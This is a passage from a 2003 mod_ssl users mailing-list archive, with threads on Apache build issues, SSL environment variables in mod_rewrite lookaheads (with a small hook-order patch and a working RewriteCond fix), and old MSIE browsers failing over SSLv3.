>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Swiss =
Exchange.
This e-mail is of a private and personal nature. It is not related to
the exchange or business activities of the SWX Swiss Exchange. Le
pr=E9sent e-mail est un message priv=E9 et personnel, sans rapport avec
l'activit=E9 boursi=E8re de la SWX Swiss Exchange.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 21 19:20:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 82FA3A8947; Mon, 21 Jul 2003 19:20:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 38A45A8934
	for ; Mon, 21 Jul 2003 19:20:30 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 846956E406A; Mon, 21 Jul 2003 19:20:27 +0200 (CEST)
Date: Mon, 21 Jul 2003 19:20:27 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Flex failure during apache 1.3.28 make - RESOLVED
Message-ID: <20030721172027.GA23730@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Jul 21, 2003 at 05:14:53PM +0200, Boyle Owen wrote:
> Thanks all!
> 
> Touching the .c files in src/modules/ssl let flex do its work and the
> make continued without a hitch.
> 
Well, to be precise, that's not what happened. Make checks the date of the 
.c file that is output from flex - if the output is newer, then make does
not try to run flex.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 24 20:26:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C0C91A8946; Thu, 24 Jul 2003 20:26:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gonk.valueweb.net (gonk.valueweb.net [216.219.253.46])
	by master.modssl.org (Postfix) with ESMTP id 0747DA8933
	for ; Thu, 24 Jul 2003 20:26:00 +0200 (CEST)
Received: (from pchampon@localhost)
	by gonk.valueweb.net (8.12.9/8.12.9) id h6OIPumh014400
	for modssl-users@modssl.org; Thu, 24 Jul 2003 14:25:56 -0400 (EDT)
Date: Thu, 24 Jul 2003 14:25:56 -0400
From: Philip Champon 
To: modssl-users@modssl.org
Subject: CGI/SSL spec?
Message-ID: <20030724182555.GC8278@gonk.valueweb.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.99i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Philip Champon 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I tried searching the archives, to find out where I might be able
to read about a CGI/SSL spec, but I couldn't turn anything up?
While I have read the mod_ssl ref on envirionment variables, I was
hoping to find out what source the group used to compile this list
of environment variables. I also consulted the CGI spec, but it did
not cover any SSL specific variables.

Could someone tell me, is there such a spec, or did the group arbitrarily
compile a list of SSL env vars to include in the CGI env?

-- 
thanks,
Philip Champon Affinity Developer
Ph - 954-334-8156
Em - pchampon@valueweb.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 28 12:10:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1139EA8959; Mon, 28 Jul 2003 12:10:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp2.clear.net.nz (smtp2.clear.net.nz [203.97.37.27])
	by master.modssl.org (Postfix) with ESMTP id BB71EA8933
	for ; Mon, 28 Jul 2003 12:10:13 +0200 (CEST)
Received: from mygale.fifthweb.net (apo.fifthweb.net [203.97.8.218])
 by smtp2.clear.net.nz (CLEAR Net Mail)
 with SMTP id <0HIQ00CU4C8GP2@smtp2.clear.net.nz> for modssl-users@modssl.org;
 Mon, 28 Jul 2003 22:09:53 +1200 (NZST)
Received: (qmail 2213 invoked from network); Mon, 28 Jul 2003 10:09:52 +0000
Received: from localhost (HELO xtra.co.nz) (127.0.0.1) by 0 with SMTP; Mon,
 28 Jul 2003 10:09:52 +0000
Date: Mon, 28 Jul 2003 22:09:49 +1200
From: James Collier 
Subject: Apache2: mod_rewrite and mod_ssl interaction changed?
To: modssl-users@modssl.org
Message-id: <3F24F66D.8090704@xtra.co.nz>
Organization: Fifth Web Ltd.
MIME-version: 1.0
Content-type: text/plain; format=flowed; charset=us-ascii
Content-transfer-encoding: 7bit
X-Accept-Language: en, de, de-at, de-de, de-ch, el, fr, fr-be, fr-ca, fr-fr,
 fr-ch
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030313
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am in the process of upgrading a site from 1.3.x to 2.0.47, and have
encountered a (perhaps obscure) problem.

For mod_rewrite I sometimes need to extract and/or test client
certificate field values.

Under 1.3.27/2.8.14 and earlier I could use - (at virtual host level):

===================

SSLEngine on
...
SSLVerifyClientRequire
SSLOptions +StdEnvVars +StrictRequire
...
RewriteEngine on
RewriteLogLevel 9
...
RewriteCond %{LA_U:SSL_CLIENT_S_DN} (..*)

====================

As of apache 2, the rewrite log shows that the SSL_X environment
variables (and the HTTPS variable) are not being set during the lookahead.

Can anyone think what might have changed that would cause this? e.g. any
changes in the ssl fixup-phase hook handler and sub-request handling?

Better still, can anyone think of a way to force the variable processing
in the subrequest?

    Thanks & regards,
        James Collier




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 28 12:19:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CEDCEA8959; Mon, 28 Jul 2003 12:19:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lacrosse.corp.redhat.com (pix-525-pool.redhat.com [66.187.233.200])
	by master.modssl.org (Postfix) with ESMTP id C162CA8933
	for ; Mon, 28 Jul 2003 12:19:05 +0200 (CEST)
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by lacrosse.corp.redhat.com (8.11.6/8.9.3) with ESMTP id h6SAIuK07058;
	Mon, 28 Jul 2003 06:18:56 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.8/8.12.7) with ESMTP id h6SAIttx017454;
	Mon, 28 Jul 2003 11:18:55 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.8/8.12.8/Submit) id h6SAIsZQ017453;
	Mon, 28 Jul 2003 11:18:54 +0100
Date: Mon, 28 Jul 2003 11:18:54 +0100
From: Joe Orton 
To: James Collier 
Cc: modssl-users@modssl.org
Subject: Re: Apache2: mod_rewrite and mod_ssl interaction changed?
Message-ID: <20030728101854.GB16913@redhat.com>
Mail-Followup-To: James Collier ,
	modssl-users@modssl.org
References: <3F24F66D.8090704@xtra.co.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3F24F66D.8090704@xtra.co.nz>
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Jul 28, 2003 at 10:09:49PM +1200, James Collier wrote:
> I am in the process of upgrading a site from 1.3.x to 2.0.47, and have
> encountered a (perhaps obscure) problem.
> 
> For mod_rewrite I sometimes need to extract and/or test client
> certificate field values.
> 
> Under 1.3.27/2.8.14 and earlier I could use - (at virtual host level):
> 
> ===================
> 
> SSLEngine on
> ...
> SSLVerifyClientRequire
> SSLOptions +StdEnvVars +StrictRequire
> ...
> RewriteEngine on
> RewriteLogLevel 9
> ...
> RewriteCond %{LA_U:SSL_CLIENT_S_DN} (..*)
> 
> ====================
> 
> As of apache 2, the rewrite log shows that the SSL_X environment
> variables (and the HTTPS variable) are not being set during the lookahead.
> 
> Can anyone think what might have changed that would cause this? e.g. any
> changes in the ssl fixup-phase hook handler and sub-request handling?

Yes, a few people have reported this problem... the mod_ssl fixup
handler is running to late to be useful like this in 2.0: you should be
able to fix it as below:

Index: mod_ssl.c
===================================================================
RCS file: /store/cvs/root/httpd-2.0/modules/ssl/mod_ssl.c,v
retrieving revision 1.86
diff -u -r1.86 mod_ssl.c
--- mod_ssl.c	24 Jun 2003 21:40:32 -0000	1.86
+++ mod_ssl.c	28 Jul 2003 10:17:26 -0000
@@ -508,7 +508,7 @@
     ap_hook_child_init    (ssl_init_Child,         NULL,NULL, APR_HOOK_MIDDLE);
     ap_hook_translate_name(ssl_hook_Translate,     NULL,NULL, APR_HOOK_MIDDLE);
     ap_hook_check_user_id (ssl_hook_UserCheck,     NULL,NULL, APR_HOOK_FIRST);
-    ap_hook_fixups        (ssl_hook_Fixup,         NULL,NULL, APR_HOOK_MIDDLE);
+    ap_hook_fixups        (ssl_hook_Fixup,         NULL,NULL, APR_HOOK_REALLY_FIRST);
     ap_hook_access_checker(ssl_hook_Access,        NULL,NULL, APR_HOOK_MIDDLE);
     ap_hook_auth_checker  (ssl_hook_Auth,          NULL,NULL, APR_HOOK_MIDDLE);
     ap_hook_post_read_request(ssl_hook_ReadReq,    NULL,NULL, APR_HOOK_MIDDLE);


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 28 13:18:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B9E1FA8959; Mon, 28 Jul 2003 13:18:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.clear.net.nz (smtp1.clear.net.nz [203.97.33.27])
	by master.modssl.org (Postfix) with ESMTP id 07903A8933
	for ; Mon, 28 Jul 2003 13:18:22 +0200 (CEST)
Received: from mygale.fifthweb.net (apo.fifthweb.net [203.97.8.218])
 by smtp1.clear.net.nz (CLEAR Net Mail)
 with SMTP id <0HIQ0056QFE1UM@smtp1.clear.net.nz> for modssl-users@modssl.org;
 Mon, 28 Jul 2003 23:18:01 +1200 (NZST)
Received: (qmail 3192 invoked from network); Mon, 28 Jul 2003 11:18:00 +0000
Received: from localhost (HELO xtra.co.nz) (127.0.0.1) by 0 with SMTP; Mon,
 28 Jul 2003 11:18:00 +0000
Date: Mon, 28 Jul 2003 23:17:56 +1200
From: James Collier 
Subject: Re: Apache2: mod_rewrite and mod_ssl interaction changed?
In-reply-to: <20030728101854.GB16913@redhat.com>
To: modssl-users@modssl.org
Message-id: <3F250664.9030205@xtra.co.nz>
Organization: Cyberdyne Systems Ltd.
MIME-version: 1.0
Content-type: text/plain; format=flowed; charset=us-ascii
Content-transfer-encoding: 7bit
X-Accept-Language: en, de, de-at, de-de, de-ch, el, fr, fr-be, fr-ca, fr-fr,
 fr-ch
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030313
References: <3F24F66D.8090704@xtra.co.nz> <20030728101854.GB16913@redhat.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe Orton wrote:
> On Mon, Jul 28, 2003 at 10:09:49PM +1200, James Collier wrote:
> 
>>I am in the process of upgrading a site from 1.3.x to 2.0.47, and have
>>encountered a (perhaps obscure) problem.
>>
>>For mod_rewrite I sometimes need to extract and/or test client
>>certificate field values.
>>
>>Under 1.3.27/2.8.14 and earlier I could use - (at virtual host level):
>>
>>===================
>>
>>SSLEngine on
>>...
>>SSLVerifyClientRequire
>>SSLOptions +StdEnvVars +StrictRequire
>>...
>>RewriteEngine on
>>RewriteLogLevel 9
>>...
>>RewriteCond %{LA_U:SSL_CLIENT_S_DN} (..*)
>>
>>====================
>>
>>As of apache 2, the rewrite log shows that the SSL_X environment
>>variables (and the HTTPS variable) are not being set during the lookahead.
>>
>>Can anyone think what might have changed that would cause this? e.g. any
>>changes in the ssl fixup-phase hook handler and sub-request handling?
> 
> 
> Yes, a few people have reported this problem... the mod_ssl fixup
> handler is running to late to be useful like this in 2.0: you should be
> able to fix it as below:
> 
> Index: mod_ssl.c
> ===================================================================
> RCS file: /store/cvs/root/httpd-2.0/modules/ssl/mod_ssl.c,v
> retrieving revision 1.86
> diff -u -r1.86 mod_ssl.c
> --- mod_ssl.c	24 Jun 2003 21:40:32 -0000	1.86
> +++ mod_ssl.c	28 Jul 2003 10:17:26 -0000
> @@ -508,7 +508,7 @@
>      ap_hook_child_init    (ssl_init_Child,         NULL,NULL, APR_HOOK_MIDDLE);
>      ap_hook_translate_name(ssl_hook_Translate,     NULL,NULL, APR_HOOK_MIDDLE);
>      ap_hook_check_user_id (ssl_hook_UserCheck,     NULL,NULL, APR_HOOK_FIRST);
> -    ap_hook_fixups        (ssl_hook_Fixup,         NULL,NULL, APR_HOOK_MIDDLE);
> +    ap_hook_fixups        (ssl_hook_Fixup,         NULL,NULL, APR_HOOK_REALLY_FIRST);
>      ap_hook_access_checker(ssl_hook_Access,        NULL,NULL, APR_HOOK_MIDDLE);
>      ap_hook_auth_checker  (ssl_hook_Auth,          NULL,NULL, APR_HOOK_MIDDLE);
>      ap_hook_post_read_request(ssl_hook_ReadReq,    NULL,NULL, APR_HOOK_MIDDLE);
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

Many thanks for the quick response, Joe.

I have applied the proposed patch, but unfortunately it does not seem to 
have fixed the problem.

I will investigate further and report back.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 28 21:03:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 37D51A8969; Mon, 28 Jul 2003 21:03:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from localhost.localdomain (van-svr-02.pk3i.com [66.48.43.5])
	by master.modssl.org (Postfix) with ESMTP id BC371A8962
	for ; Mon, 28 Jul 2003 21:03:23 +0200 (CEST)
X-Envelope-To: 
Received: from himanshu (office.pk3i.com [142.179.108.106])
	by localhost.localdomain (8.12.9/8.12.9) with ESMTP id h6SJ3Dlc014273
	for ; Mon, 28 Jul 2003 12:03:18 -0700
From: "Himanshu Soni" 
To: 
Subject: Re: Apache2: mod_rewrite and mod_ssl interaction changed?
Date: Mon, 28 Jul 2003 12:03:09 -0700
Message-ID: <003101c3553a$e89f1630$6612060a@pk3i.local>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Himanshu Soni" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Try this to access the SSl server variables:
 %{LA-U:ENV:SSL_CLIENT_S_DN}

> > -----Original Message-----
> > From: owner-modssl-users@modssl.org 
> > [mailto:owner-modssl-users@modssl.org] On Behalf Of James Collier
> > Sent: Monday, July 28, 2003 4:18 AM
> > To: modssl-users@modssl.org
> > Subject: Re: Apache2: mod_rewrite and mod_ssl interaction changed?
> > 
> > 
> > Joe Orton wrote:
> > > On Mon, Jul 28, 2003 at 10:09:49PM +1200, James Collier wrote:
> > > 
> > >>I am in the process of upgrading a site from 1.3.x to 
> > 2.0.47, and have
> > >>encountered a (perhaps obscure) problem.
> > >>
> > >>For mod_rewrite I sometimes need to extract and/or test client
> > >>certificate field values.
> > >>
> > >>Under 1.3.27/2.8.14 and earlier I could use - (at virtual 
> > host level):
> > >>
> > >>===================
> > >>
> > >>SSLEngine on
> > >>...
> > >>SSLVerifyClientRequire
> > >>SSLOptions +StdEnvVars +StrictRequire
> > >>...
> > >>RewriteEngine on
> > >>RewriteLogLevel 9
> > >>...
> > >>RewriteCond %{LA_U:SSL_CLIENT_S_DN} (..*)
> > >>
> > >>====================
> > >>
> > >>As of apache 2, the rewrite log shows that the SSL_X environment
> > >>variables (and the HTTPS variable) are not being set during 
> > the lookahead.
> > >>
> > >>Can anyone think what might have changed that would cause 
> > this? e.g. any
> > >>changes in the ssl fixup-phase hook handler and sub-request 
> > handling?
> > > 
> > > 
> > > Yes, a few people have reported this problem... the mod_ssl fixup
> > > handler is running to late to be useful like this in 2.0: 
> > you should be
> > > able to fix it as below:
> > > 
> > > Index: mod_ssl.c
> > > 
> ===================================================================
> > > RCS file: /store/cvs/root/httpd-2.0/modules/ssl/mod_ssl.c,v
> > > retrieving revision 1.86
> > > diff -u -r1.86 mod_ssl.c
> > > --- mod_ssl.c	24 Jun 2003 21:40:32 -0000	1.86
> > > +++ mod_ssl.c	28 Jul 2003 10:17:26 -0000
> > > @@ -508,7 +508,7 @@
> > >      ap_hook_child_init    (ssl_init_Child,         
> > NULL,NULL, APR_HOOK_MIDDLE);
> > >      ap_hook_translate_name(ssl_hook_Translate,     
> > NULL,NULL, APR_HOOK_MIDDLE);
> > >      ap_hook_check_user_id (ssl_hook_UserCheck,     
> > NULL,NULL, APR_HOOK_FIRST);
> > > -    ap_hook_fixups        (ssl_hook_Fixup,         
> > NULL,NULL, APR_HOOK_MIDDLE);
> > > +    ap_hook_fixups        (ssl_hook_Fixup,         
> > NULL,NULL, APR_HOOK_REALLY_FIRST);
> > >      ap_hook_access_checker(ssl_hook_Access,        
> > NULL,NULL, APR_HOOK_MIDDLE);
> > >      ap_hook_auth_checker  (ssl_hook_Auth,          
> > NULL,NULL, APR_HOOK_MIDDLE);
> > >      ap_hook_post_read_request(ssl_hook_ReadReq,    
> > NULL,NULL, APR_HOOK_MIDDLE);
> > > 
> > > 
> > > 
> > 
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   
> > www.modssl.org
> > > User Support Mailing List                    
> >   modssl-users@modssl.org
> > > Automated List Manager                            
> > majordomo@modssl.org
> > 
> > Many thanks for the quick response, Joe.
> > 
> > I have applied the proposed patch, but unfortunately it does 
> > not seem to 
> > have fixed the problem.
> > 
> > I will investigate further and report back.
> > 
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                    
>   modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> > 
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 10:52:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DE557A8959; Tue, 29 Jul 2003 10:52:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta201-rme.xtra.co.nz (mta201-rme.xtra.co.nz [210.86.15.144])
	by master.modssl.org (Postfix) with ESMTP id 43ECEA8934
	for ; Tue, 29 Jul 2003 10:52:42 +0200 (CEST)
Received: from mta2-rme.xtra.co.nz ([210.86.15.140])
          by mta201-rme.xtra.co.nz with ESMTP
          id <20030729085229.LBLE1162.mta201-rme.xtra.co.nz@mta2-rme.xtra.co.nz>
          for ; Tue, 29 Jul 2003 20:52:29 +1200
Received: from kanga.cyberdyne.co.mars ([210.86.53.93])
          by mta2-rme.xtra.co.nz with SMTP
          id <20030729085229.IFCP9359.mta2-rme.xtra.co.nz@kanga.cyberdyne.co.mars>
          for ; Tue, 29 Jul 2003 20:52:29 +1200
Received: (qmail 94879 invoked from network); 29 Jul 2003 08:52:26 -0000
Received: from tigger.cyberdyne.co.mars (HELO xtra.co.nz) (10.146.171.54)
  by 0 with SMTP; 29 Jul 2003 08:52:26 -0000
Message-ID: <3F2635CA.1040506@xtra.co.nz>
Date: Tue, 29 Jul 2003 20:52:26 +1200
From: James Collier 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.3.1) Gecko/20030629
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache2: mod_rewrite and mod_ssl interaction changed?
References: <003101c3553a$e89f1630$6612060a@pk3i.local>
In-Reply-To: <003101c3553a$e89f1630$6612060a@pk3i.local>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Himanshu Soni wrote:
> Try this to access the SSl server variables:
>  %{LA-U:ENV:SSL_CLIENT_S_DN}
> 

Brilliant!  Many thanks - that seems to work perfectly.

Not something I'd have guessed, either.  In the words of Brian Moore ... 
"Damned cool voodoo, but still voodoo"

   -- James

> 
>>>-----Original Message-----
>>>From: owner-modssl-users@modssl.org 
>>>[mailto:owner-modssl-users@modssl.org] On Behalf Of James Collier
>>>Sent: Monday, July 28, 2003 4:18 AM
>>>To: modssl-users@modssl.org
>>>Subject: Re: Apache2: mod_rewrite and mod_ssl interaction changed?
>>>
>>>
>>>Joe Orton wrote:
>>>
>>>>On Mon, Jul 28, 2003 at 10:09:49PM +1200, James Collier wrote:
>>>>
>>>>
>>>>>I am in the process of upgrading a site from 1.3.x to 
>>>
>>>2.0.47, and have
>>>
>>>>>encountered a (perhaps obscure) problem.
>>>>>
>>>>>For mod_rewrite I sometimes need to extract and/or test client
>>>>>certificate field values.
>>>>>
>>>>>Under 1.3.27/2.8.14 and earlier I could use - (at virtual 
>>>
>>>host level):
>>>
>>>>>===================
>>>>>
>>>>>SSLEngine on
>>>>>...
>>>>>SSLVerifyClientRequire
>>>>>SSLOptions +StdEnvVars +StrictRequire
>>>>>...
>>>>>RewriteEngine on
>>>>>RewriteLogLevel 9
>>>>>...
>>>>>RewriteCond %{LA_U:SSL_CLIENT_S_DN} (..*)
>>>>>
>>>>>====================
>>>>>
>>>>>As of apache 2, the rewrite log shows that the SSL_X environment
>>>>>variables (and the HTTPS variable) are not being set during 
>>>
>>>the lookahead.
>>>
>>>>>Can anyone think what might have changed that would cause 
>>>
>>>this? e.g. any
>>>
>>>>>changes in the ssl fixup-phase hook handler and sub-request 
>>>
>>>handling?
>>>
>>>>
>>>>Yes, a few people have reported this problem... the mod_ssl fixup
>>>>handler is running to late to be useful like this in 2.0: 
>>>
>>>you should be
>>>
>>>>able to fix it as below:
>>>>
>>>>Index: mod_ssl.c
>>>>
>>
>>===================================================================
>>
>>>>RCS file: /store/cvs/root/httpd-2.0/modules/ssl/mod_ssl.c,v
>>>>retrieving revision 1.86
>>>>diff -u -r1.86 mod_ssl.c
>>>>--- mod_ssl.c	24 Jun 2003 21:40:32 -0000	1.86
>>>>+++ mod_ssl.c	28 Jul 2003 10:17:26 -0000
>>>>@@ -508,7 +508,7 @@
>>>>     ap_hook_child_init    (ssl_init_Child,         
>>>
>>>NULL,NULL, APR_HOOK_MIDDLE);
>>>
>>>>     ap_hook_translate_name(ssl_hook_Translate,     
>>>
>>>NULL,NULL, APR_HOOK_MIDDLE);
>>>
>>>>     ap_hook_check_user_id (ssl_hook_UserCheck,     
>>>
>>>NULL,NULL, APR_HOOK_FIRST);
>>>
>>>>-    ap_hook_fixups        (ssl_hook_Fixup,         
>>>
>>>NULL,NULL, APR_HOOK_MIDDLE);
>>>
>>>>+    ap_hook_fixups        (ssl_hook_Fixup,         
>>>
>>>NULL,NULL, APR_HOOK_REALLY_FIRST);
>>>
>>>>     ap_hook_access_checker(ssl_hook_Access,        
>>>
>>>NULL,NULL, APR_HOOK_MIDDLE);
>>>
>>>>     ap_hook_auth_checker  (ssl_hook_Auth,          
>>>
>>>NULL,NULL, APR_HOOK_MIDDLE);
>>>
>>>>     ap_hook_post_read_request(ssl_hook_ReadReq,    
>>>
>>>NULL,NULL, APR_HOOK_MIDDLE);
>>>
>>>>
>>>>
>>______________________________________________________________________
>>
>>>
>>>Many thanks for the quick response, Joe.
>>>
>>>I have applied the proposed patch, but unfortunately it does 
>>>not seem to 
>>>have fixed the problem.
>>>
>>>I will investigate further and report back.
>>>
>>>
>>
>>______________________________________________________________________
>>
>>>Apache Interface to OpenSSL (mod_ssl)                   
>>
>>www.modssl.org
>>
>>>User Support Mailing List                    
>>
>>  modssl-users@modssl.org
>>
>>>Automated List Manager                            
>>
>>majordomo@modssl.org
>>
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 11:25:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CE5D9A8959; Tue, 29 Jul 2003 11:25:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id 0F48CA8934
	for ; Tue, 29 Jul 2003 11:25:57 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id <33PGK343>; Tue, 29 Jul 2003 11:25:52 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: Problems with old MSIE 5.0
Date: Tue, 29 Jul 2003 11:25:50 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello.

After upgrading to 2.0.47 we have been experiencing problems with clients
using old MSIE 5.0 browsers (40 bit versions). They are suddenly unable to
connect, and get a "The page cannot be displayed" error.

However, disabling SSLv3 "cures" the problem.

We are using glibc-2.3.2.

The MSIE version we have tried is 5.00.2614.3500, on W2K, but quite a few
clients are experiencing problemms.

Any suggestions?

-Torvald Bringsvor
Ergo Integration AS
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 29 11:58:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BC73DA8959; Tue, 29 Jul 2003 11:58:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
